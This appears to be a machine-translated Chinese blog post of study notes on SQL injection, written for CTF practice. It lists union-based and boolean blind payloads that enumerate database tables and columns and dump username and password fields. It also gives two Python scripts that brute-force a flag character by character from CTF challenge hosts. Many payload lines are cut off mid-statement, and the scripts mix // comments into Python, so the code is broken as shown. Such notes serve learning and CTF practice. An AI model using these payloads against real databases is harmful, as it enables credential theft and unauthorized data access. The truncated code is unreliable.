当前位置：网站首页>SQL injection -day17

SQL injection -day17

2022-06-30 02:15:00 【kanna_ bush_ t】

Four 、union Joint injection ( The single quotation mark closed character type is taken as an example )

4.5 Check the library

?id=-1' union select 1,(select group_concat(table_name) from information_sch

4.5.1 Look up a table in a library

Be careful ： Just check the current database database() Table of , Because it is under the current database , You cannot view data in other databases .

4.5.2 List

?id=-1' union select 1,(select group_concat(column_name) from information_schema

4.5.3 Search content , ~ Connect

?id=-1' union select 1,(select group_concat(concat_ws('~',username,password)

// Look up three columns of data at the same time 
?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from u

5、 ... and 、Boolean Blind note

5.1 Manual ： combination Burp Blasting progress

5.1.1 Check the database length

?id=1' and length(database())=1--+
// Blasting numbers 1

5.1.2 Judge the composition of the database name security

?id=1' and left(database(),1)='a'--+
// Blasting letters  a

?id=1' and ascii(substr(database(),1,1))='b'--+
// Blast  ascii  value  b

5.1.3 Look up the table users

?id=1' and ascii(substr((select table_name from information_schema.tables wh

// At the same time, the numbers are exploded a, and   Numbers b, among  b  yes  ascii  value

5.1.4 List username password

?id=1' and ascii(substr((select column_name from information_schema.tables w
// At the same time, the numbers are exploded a, and   Numbers b, among  b  yes  ascii  value

5.1.5 Search content

?id=1' and ascii(substr((select username from security.users limit a,1),1,1)
// Blast  ascii  value  b

?id=1' and ascii(substr((select password from security.users limit 0,1),1,1)
// Blast  ascii  value  b

5.2 Script

5.2.1 direct method （ slower , High accuracy ）

import requests
url = "http://ba63d0df-d99d-4cba-a692-5027868780b6.challenge.ctf.show:8080/a 
b="{zxcvbnmasdfghjklqwertyuiop-1234567890}_" //  Dictionary library , Contains lowercase alphanumeric - Underline }{ 
flag = '' 
for i in range (1,50): 
for h in b: 
//payload Construct effective according to the topic environment payload 
payload = "' or if((mid((select group_concat(f1ag) from ctfshow_flxg
//payload = "' or if((mid((select database()),{},1)='{}'),1,0) -- ".f
//payload = "' or if((mid((select group_concat(column_name) from info
//payload = "' or if((mid((select+group_concat(table_name) from infor
//print(payload)
data = {
"username":payload, // Injection point 
"password":1
}
s=requests.post(url,data=data) // send out post request 
//print(s.text)
if "\\u5bc6\\u7801\\u9519\\u8bef" in s.text: //  Echo according to different , Find effective 
flag+=h // Keep the string for the correct case 
print('flag is {}'.format(flag))
break
if flag[-1] == "}"://  Find the complete flag
print("flag :"+flag)
break

5.2.2 Dichotomy

import requests 
url = "http://ecaca1c3-ce93-4f20-82b6-ea325d85e6c3.node4.buuoj.cn:81/search. 
i = 0 
flag = '' 
while True: 
i+=1 
header = 32 
tail = 128 
while header<tail:
mid = (header+tail)>>1
data = {
'id':f"1^(ord(substr((select(group_concat(password))from(F1naI1y
}
s=requests.get(url,params=data)
if 'Click' in s.text:
header = mid+1 // sql When the statement is correct 
else:
tail = mid // sql Statement error execution 
if header!=32:
flag+=chr(header)
print(flag)
else:
break

原网站

版权声明
本文为[kanna_ bush_ t]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202160705472874.html